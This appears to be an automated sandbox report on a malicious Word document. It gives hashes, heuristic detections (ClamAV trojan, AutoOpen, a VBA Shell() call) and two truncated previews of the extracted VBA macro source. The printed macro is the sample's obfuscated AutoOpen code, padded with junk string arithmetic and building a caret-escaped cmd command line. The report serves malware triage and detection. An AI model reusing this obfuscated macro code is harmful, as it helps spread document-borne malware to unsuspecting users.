Office (OLE) malware analysis — malicious · 0dbd38d7502e2fc3

MALICIOUS

Office (OLE)

93.1 KB Created: 2018-09-28 07:53:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 54efa3a21c4500a6f2bd0039615e2875 SHA-1: 93fea75d5c2073ae56df6cd128240a9762f57200 SHA-256: 0dbd38d7502e2fc3e11651495fe95b40e6f6590e93784831950fa24477728c68

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic firing for a Shell() call within VBA macros, indicating the execution of arbitrary commands. The AutoOpen macro is present, which is a common technique for automatically executing malicious code upon opening the document. The ClamAV detection further confirms the malicious nature of the file, identifying it as Doc.Trojan.Agent-6922946-0.

Heuristics 6

ClamAV: Doc.Trojan.Agent-6922946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Agent-6922946-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37092 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37092 bytes
SHA-256: `6ecec73798629a8b5baf4e6aab5ad8e856a6e1461bf49cbc8cc704514561f18d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AwCiUoUS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim BVquq(2) BVquq(0) = InStr(HEtZZ + LjOtViCBATtaVBpdWR + mZaZNO, ECRSi + EnlwTqajKjisqlNRbTui + MvOdfbwf) + InStrRev(qkTibMO + hfwUILEMPGKFRvMjAj + RzFFS, PEATnIPa + zWkPUaTIWjziucfVDFNVW + KliCr) + Right(OANzn + UmKMJPGnpfkEmANPT + pGfLsTtS, 952) + InStr(wiTDIMk + woWHPBNMmYUwDhw + MVsqB, tjrAio + BkYvofFLQFozbOObr + fGHkIiUl) BVquq(1) = InStr(wTvTJCim + jZvTFWQmQNUYFoEIBkZ + subjSL, KNPFKnil + zdabvPrOidfiHbLvDzak + KpwHA) + InStrRev(GjasrQ + RbzBLfiChMTqYtBSk + jOEGYw, mLMJm + jNibhvaFfQYBzqwAsjwFGk + uAHhElvK) Dim ISUJZz(2) ISUJZz(0) = InStrRev(ZiLwN + mdtmHXFEfnwwLmCKFSfiJz + KwjwnJIS, YjQRM + mAbwmYWDsFGukodIYhAopt + QVtoF) + Right(XwDBX + EjQCLRjDrjDlLlDITFY + ArpMr, 496) + Right(kOcQY + QmhSCECHlkRwOjaLCU + rdUaT, 573) + Left(nwWshY + AzUiaIZufKMkMshqpi + snRzSbW, 452) ISUJZz(1) = Right(TKFzpik + fnTXiaOJzhQYXOcuqzXIf + BiMCDF, 398) + Left(vZPmWDRW + KvnqXvUazHfnBIYzwcvkZTC + nmjBkh, 216) + Left(opHifq + PlNizTUZVPLOWVQsRGvGqhK + pOwFu, 666) + InStrRev(QspSLb + vPzSUkswZjUfXYNjMZKR + EzFzZF, uuSLcnw + HUwjlvDuzrwmlzPqivY + ikcib) Dim kiUCwh(2) kiUCwh(0) = InStrRev(GJtiHn + ITsdXzIiAtQQcwX + RjBmQw, BtLRsb + jSDcjUvnhRRjkjcqZR + aXdHo) + Right(JZzFtjU + GOGwjiukNblQltFcFFEfG + ssnYzP, 46) + InStr(LLHcvcB + NqsnDMPrYXBiznCpLOMjR + hWdhcEh, VfFoaIYX + icMTRJaLMAGbftzKwT + FRjjOOD) + Left(FrSGUCLX + VssODSTubNhGOwkcLzI + BjUOK, 834) kiUCwh(1) = InStr(ucwlMDc + ToObYkDIAbvqtNNUwEkXp + iPNtwIP, TIlczQG + KrEikPfpOqjRYGovUBTf + tNvkVi) + Right(jijivizN + AZuCjlrsKbprLfSkFnfs + uQDLJzH, 858) + InStr(zVrdKtc + MqnYDcnvDMUhwRphSNUwXff + ZZMKZFiu, AiVCdpHL + ZnqFvostPsXfDqBvcP + cnwzKqH) + InStrRev(NZaljH + fqArAcDjZwFQpHNRwqP + wYKFNkU, KzZXrcL + iRJLDXYjVqSuOscSzTvF + GsiiNl) Dim YpHUn(2) YpHUn(0) = InStrRev(wXOod + IlZGjsMAtJWtAPNJTJ + mQWkPl, XDUkG + hoNMpOKZjFWzbsBXmq + caOkmM) + InStr(mMijVGz + cswDJOmhscijBUklaiY + tSKRuzEu, KwQQSL + jUBDDsMBVMEhAKqE + DohwLrr) YpHUn(1) = InStr(Sawap + qPwZiwiiCFQQGbGIjUFsUAJ + msuOq, bGuEFG + IlanzTqJJKakWZAiwBH + KmzAOM) + Left(WBkjZV + SClFjiFcUiEbBuAcLq + wjkEjmu, 997) ABwNzMruRnFvs (KeyString(kkcnUmn + wtSQh + 19 + 12 + 36 + wAsww + uqzfk) + kkRTfD + HjKiq + KeyString(BpLzVP + CiBZiw + 22 + 14 + 41 + DumOJ + BhXtsMnR) + USwdjcjo + HwNdoGvChP + dwWltf + YthVwUwj) Dim tnXAa(1) tnXAa(0) = InStr(vaASiU + LXEdIwIvuimjlCEb + tdYiPz, cqYGS + tGhRwfbGZHIqPQdtRufvsJrG + KIwAm) + Left(XKOiRWhI + OnMNipcUOKoHEChRLI + TFjCHA, 455) Dim kUcTGq(2) kUcTGq(0) = InStrRev(Tfjdmj + JITzrjKOsHvmUPXEncFB + wrdUv, htzrDw + oREOikfwENOiOGHwsF + TLlOtXcb) + InStrRev(RzKAndR + SPhSrSLswADhlbkWmbidwmN + ETdjZM, mstvhir + YjNjQkvhRjmljooRTT + BzwKDa) kUcTGq(1) = Right(qzjOdBon + lsvApBMPtqaLzuOMZcUcVt + RABAA, 667) + InStrRev(lZBKwwo + FQnjUpFVIUQGBwuPqs + oPIoLYVb, RPdzWzl + faCRWzuIEZrSQTLaijAhf + LdCaziiw) + InStrRev(mzmpQP + PvwwEzlKhOinYoQGa + MWFGNWZl, fKPizM + YLTwhZPKOBAJUicswm + ZUzzi) + InStr(YbrCC + QoahwLLNIluvzXQszuckj + FpZIG, tSoSRo + pGoNnLFBRlKvhtqqGW + BtaCj) Dim IcYzE(2) IcYzE(0) = Left(TDwzoQqU + LfkZbwdiAmTNSHIJlv + HamuHh, 876) + InStrRev(MBqBwah + WaUJzmaWJhLvcdzoEFw + FHMTXTj, aZCzwaz + LkiWQYHUbtaFZojdSDCcGjV + PfZqwYk) + InStr(iqoMi + hEUzNuhUodIqvVaYpC + jpofVCp, DWYbAD + lrWHvsbsuSmJianKZ + ffiJFl) + Left(vRGWDK + lNvEcHUKtTtAuTMLrZmW + dzBfnG, 865) IcYzE(1) = Right(Bwddw + NwMSJiYMCrwzrojwHUp + avvKwQqP, 756) + InStrRev(nKoOP + SkPuIICozzRoYrNSYcw + LHkMjAS, sWmYfnnI + tSWtnMlAwtzWYnjpZoiOa + oAMaf) End Sub Attribute VB_Name = "TTJoNzzvDRnz" Function USwdjcjo() PvnXmiEiS = "d /V^:^O/C" + """" + "^s^e^t ^K^Zv^O=^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^" Dim VMlbFu(1) VMlbFu(0) = InStr(AUzpIRTu + nECoMBwHoSnfqPmjTF + iIizqDQ, GOXEi + jiCnYWMpVSBjKXdhfiEGzq + hQmPM) + InStrRev(ApDRNLv + VlOOzlplKCRizfOfZ + GUtJh, FHjuwl + fIwiwdBVVQAUizCP ... (truncated)

SHA-256: 6ecec73798629a8b5baf4e6aab5ad8e856a6e1461bf49cbc8cc704514561f18d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AwCiUoUS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim BVquq(2)
BVquq(0) = InStr(HEtZZ + LjOtViCBATtaVBpdWR + mZaZNO, ECRSi + EnlwTqajKjisqlNRbTui + MvOdfbwf) + InStrRev(qkTibMO + hfwUILEMPGKFRvMjAj + RzFFS, PEATnIPa + zWkPUaTIWjziucfVDFNVW + KliCr) + Right(OANzn + UmKMJPGnpfkEmANPT + pGfLsTtS, 952) + InStr(wiTDIMk + woWHPBNMmYUwDhw + MVsqB, tjrAio + BkYvofFLQFozbOObr + fGHkIiUl)
BVquq(1) = InStr(wTvTJCim + jZvTFWQmQNUYFoEIBkZ + subjSL, KNPFKnil + zdabvPrOidfiHbLvDzak + KpwHA) + InStrRev(GjasrQ + RbzBLfiChMTqYtBSk + jOEGYw, mLMJm + jNibhvaFfQYBzqwAsjwFGk + uAHhElvK)
   Dim ISUJZz(2)
ISUJZz(0) = InStrRev(ZiLwN + mdtmHXFEfnwwLmCKFSfiJz + KwjwnJIS, YjQRM + mAbwmYWDsFGukodIYhAopt + QVtoF) + Right(XwDBX + EjQCLRjDrjDlLlDITFY + ArpMr, 496) + Right(kOcQY + QmhSCECHlkRwOjaLCU + rdUaT, 573) + Left(nwWshY + AzUiaIZufKMkMshqpi + snRzSbW, 452)
ISUJZz(1) = Right(TKFzpik + fnTXiaOJzhQYXOcuqzXIf + BiMCDF, 398) + Left(vZPmWDRW + KvnqXvUazHfnBIYzwcvkZTC + nmjBkh, 216) + Left(opHifq + PlNizTUZVPLOWVQsRGvGqhK + pOwFu, 666) + InStrRev(QspSLb + vPzSUkswZjUfXYNjMZKR + EzFzZF, uuSLcnw + HUwjlvDuzrwmlzPqivY + ikcib)
   Dim kiUCwh(2)
kiUCwh(0) = InStrRev(GJtiHn + ITsdXzIiAtQQcwX + RjBmQw, BtLRsb + jSDcjUvnhRRjkjcqZR + aXdHo) + Right(JZzFtjU + GOGwjiukNblQltFcFFEfG + ssnYzP, 46) + InStr(LLHcvcB + NqsnDMPrYXBiznCpLOMjR + hWdhcEh, VfFoaIYX + icMTRJaLMAGbftzKwT + FRjjOOD) + Left(FrSGUCLX + VssODSTubNhGOwkcLzI + BjUOK, 834)
kiUCwh(1) = InStr(ucwlMDc + ToObYkDIAbvqtNNUwEkXp + iPNtwIP, TIlczQG + KrEikPfpOqjRYGovUBTf + tNvkVi) + Right(jijivizN + AZuCjlrsKbprLfSkFnfs + uQDLJzH, 858) + InStr(zVrdKtc + MqnYDcnvDMUhwRphSNUwXff + ZZMKZFiu, AiVCdpHL + ZnqFvostPsXfDqBvcP + cnwzKqH) + InStrRev(NZaljH + fqArAcDjZwFQpHNRwqP + wYKFNkU, KzZXrcL + iRJLDXYjVqSuOscSzTvF + GsiiNl)
   Dim YpHUn(2)
YpHUn(0) = InStrRev(wXOod + IlZGjsMAtJWtAPNJTJ + mQWkPl, XDUkG + hoNMpOKZjFWzbsBXmq + caOkmM) + InStr(mMijVGz + cswDJOmhscijBUklaiY + tSKRuzEu, KwQQSL + jUBDDsMBVMEhAKqE + DohwLrr)
YpHUn(1) = InStr(Sawap + qPwZiwiiCFQQGbGIjUFsUAJ + msuOq, bGuEFG + IlanzTqJJKakWZAiwBH + KmzAOM) + Left(WBkjZV + SClFjiFcUiEbBuAcLq + wjkEjmu, 997)
ABwNzMruRnFvs (KeyString(kkcnUmn + wtSQh + 19 + 12 + 36 + wAsww + uqzfk) + kkRTfD + HjKiq + KeyString(BpLzVP + CiBZiw + 22 + 14 + 41 + DumOJ + BhXtsMnR) + USwdjcjo + HwNdoGvChP + dwWltf + YthVwUwj)
   Dim tnXAa(1)
tnXAa(0) = InStr(vaASiU + LXEdIwIvuimjlCEb + tdYiPz, cqYGS + tGhRwfbGZHIqPQdtRufvsJrG + KIwAm) + Left(XKOiRWhI + OnMNipcUOKoHEChRLI + TFjCHA, 455)
   Dim kUcTGq(2)
kUcTGq(0) = InStrRev(Tfjdmj + JITzrjKOsHvmUPXEncFB + wrdUv, htzrDw + oREOikfwENOiOGHwsF + TLlOtXcb) + InStrRev(RzKAndR + SPhSrSLswADhlbkWmbidwmN + ETdjZM, mstvhir + YjNjQkvhRjmljooRTT + BzwKDa)
kUcTGq(1) = Right(qzjOdBon + lsvApBMPtqaLzuOMZcUcVt + RABAA, 667) + InStrRev(lZBKwwo + FQnjUpFVIUQGBwuPqs + oPIoLYVb, RPdzWzl + faCRWzuIEZrSQTLaijAhf + LdCaziiw) + InStrRev(mzmpQP + PvwwEzlKhOinYoQGa + MWFGNWZl, fKPizM + YLTwhZPKOBAJUicswm + ZUzzi) + InStr(YbrCC + QoahwLLNIluvzXQszuckj + FpZIG, tSoSRo + pGoNnLFBRlKvhtqqGW + BtaCj)
   Dim IcYzE(2)
IcYzE(0) = Left(TDwzoQqU + LfkZbwdiAmTNSHIJlv + HamuHh, 876) + InStrRev(MBqBwah + WaUJzmaWJhLvcdzoEFw + FHMTXTj, aZCzwaz + LkiWQYHUbtaFZojdSDCcGjV + PfZqwYk) + InStr(iqoMi + hEUzNuhUodIqvVaYpC + jpofVCp, DWYbAD + lrWHvsbsuSmJianKZ + ffiJFl) + Left(vRGWDK + lNvEcHUKtTtAuTMLrZmW + dzBfnG, 865)
IcYzE(1) = Right(Bwddw + NwMSJiYMCrwzrojwHUp + avvKwQqP, 756) + InStrRev(nKoOP + SkPuIICozzRoYrNSYcw + LHkMjAS, sWmYfnnI + tSWtnMlAwtzWYnjpZoiOa + oAMaf)
End Sub


Attribute VB_Name = "TTJoNzzvDRnz"
Function USwdjcjo()
PvnXmiEiS = "d /V^:^O/C" + """" + "^s^e^t ^K^Zv^O=^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^"
Dim VMlbFu(1)
VMlbFu(0) = InStr(AUzpIRTu + nECoMBwHoSnfqPmjTF + iIizqDQ, GOXEi + jiCnYWMpVSBjKXdhfiEGzq + hQmPM) + InStrRev(ApDRNLv + VlOOzlplKCRizfOfZ + GUtJh, FHjuwl + fIwiwdBVVQAUizCP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.